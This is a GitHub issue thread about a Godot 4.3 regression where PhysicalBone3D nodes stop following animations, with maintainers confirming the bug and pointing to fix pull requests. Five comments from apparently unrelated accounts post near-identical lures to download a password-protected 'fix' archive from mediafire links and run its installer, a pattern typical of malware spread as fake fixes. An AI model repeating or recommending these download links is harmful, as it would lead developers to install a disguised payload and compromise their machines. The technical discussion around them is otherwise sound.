### ISSUE TITLE
PhysicalBone3D and PhysicalBoneSimulator3D is not following animations

### ISSUE THREAD

**Issue by eddieataberk** [godotengine/godot#96202]
### Tested versions

Reproducible in 4.3

### System information

Godot v4.3.stable - Windows 10.0.22631 - Vulkan (Forward+) - dedicated NVIDIA GeForce RTX 4080 Laptop GPU (NVIDIA; 32.0.15.6094) - Intel(R) Core(TM) i9-14900HX (32 Threads)

### Issue description

In 4.3 PhysicalBone3D nodes are not following animations anymore. They are standing still in the rest position and not moving unless it is simulating physics. Breaking the ragdoll system and hit traces made with 4.2 

Rest poses seem to be broken as well
![image](https://github.com/user-attachments/assets/0f693225-9261-4911-be10-a62da1ccb2db)

### Steps to reproduce

Click Skeleton -> Create Physical Skeleton on an animated Skeleton3D

### Minimal reproduction project (MRP)

N/A

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by akien-mga** [comment]
Could you provide a minimal reproduction project that shows the issue? It's much easier for contributors to debug and fix issues if they can make sure they can see what you see.

**Comment by eddieataberk** [comment]
sure. wait a min.

**Comment by eddieataberk** [comment]
[PhysicalBone3DBug.zip](https://github.com/user-attachments/files/16777852/PhysicalBone3DBug.zip)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eddieataberk** [comment]
[PhysicalBone3DBug42.zip](https://github.com/user-attachments/files/16777961/PhysicalBone3DBug42.zip)
And this is the 4.2 version for comparison

**Comment by eddieataberk** [comment]
![bug](https://github.com/user-attachments/assets/9c61c968-6c73-4dc5-8040-c32f0be6ab96)
Made this gif to further demonstrate the issue.

**Comment by akien-mga** [comment]
I can confirm the regression with the MRPs. Starting with the 4.2 project, it seems to start breaking with 4.3.dev6.

This error gets spammed:
```
ERROR: Condition "bones[p_bone].physical_bone" is true.
   at: bind_physical_bone_to_bone (scene/3d/physical_bone_simulator_3d.cpp:129)
```

CC @lyuma @TokageItLab @fire

**Comment by eddieataberk** [comment]
@akien-mga it is closed as completed but there are still issues.

As of 4.4 dev2 physical bones while following animations and set_bone_global_pose_override() method they are ignoring SkeletonModify3D and SkeletonIK3D. Since we are using physical bones for the bullet traces too this causes issues. 

And set_bone_global_pose_override() is marked as depreciated. If we will have to use SkeletonModify3D instead this will cause further issues in the future.

You can look at the legs to see the difference between while SkeletonIK3D is applied and simulating physics.
![image](https://github.com/user-attachments/assets/0520bfaf-3713-4edb-b1c5-83c64fb8cb2f)
![image](https://github.com/user-attachments/assets/15b0fbee-c3e0-4ad7-bd18-7acf94eb502c)

**Comment by TokageItLab** [comment]
@eddieataberk I sent https://github.com/godotengine/godot/pull/97007 to fix it. Note that SkeletonModifier updates depending on the order of the tree, so make sure to put PhysicalBoneSimulator after IK and other modifiers.

**Comment by eddieataberk** [comment]
@TokageItLab Thank you. Tested it now physical bones follows the animation and modifiers correctly.

But everything else related to IK and animations seems broken now.
![image](https://github.com/user-attachments/assets/fb7774c0-03b6-4a42-861e-9bfab4e6c69e)

layered animations also have some issues some animations looks one way some another maybe there are other changes in the source build affecting it i am not sure.
![image](https://github.com/user-attachments/assets/2a154708-7c4d-446d-ab78-efa529d8174c)

**Comment by TokageItLab** [comment]
@eddieataberk What I can think of where this happens is that the CallbackModeProcess does not match between Skeleton and AnimationMixer. They need to match, make sure that.

![image](https://github.com/user-attachments/assets/71160c46-9b6c-4b36-bbda-a28c6ef29d6f) ![image](https://github.com/user-attachments/assets/04f16aef-e1f6-4768-9cd2-6345c735a050)

But if it's caused by something else, I don't have idea, I remember there was a bug in the import around AnimationLibrary, which may have something to do with it.

**Comment by eddieataberk** [comment]
@TokageItLab I believe it's something to do with importer. I am losing my mind right now lol. Since I opened the project with the custom build. i tried deleting .godot file reverting all the files from github and reimporting it with 4.3 and 4.4dev2 and issue remains even on 4.3 now. It seems bone rotations are off for some reason.

**Comment by eddieataberk** [comment]
![image](https://github.com/user-attachments/assets/4e353cf8-56bb-4b15-84a5-981b820e9c44)
i also noticed a bunch of this error. maybe related.

**Comment by eddieataberk** [comment]
I am 100% certain the issue is from Animation Library workflow. I have no idea why it didn't happened before but the easiest solution I found is to combine all animations into a single file. I was enjoying the animation library workflow and in editor retargeting but it's not reliable as of 4.3 and 4.4. If anyone else is having the same issue spending a little bit of time in Blender is more robust solution.
![image](https://github.com/user-attachments/assets/3fd9f138-c7a9-47b1-8241-d2bee429baf4)

**Comment by TokageItLab** [comment]
Basically, I think it's a compatibility issue due to AnimationLibrary regression caused by the recently introduced StringName change. I believe the latest version has some fixes.
- https://github.com/godotengine/godot/pull/96586
- https://github.com/godotengine/godot/pull/95505
- https://github.com/godotengine/godot/pull/96577
I forgot to note that such dangers lurk in the dev branch, sorry.
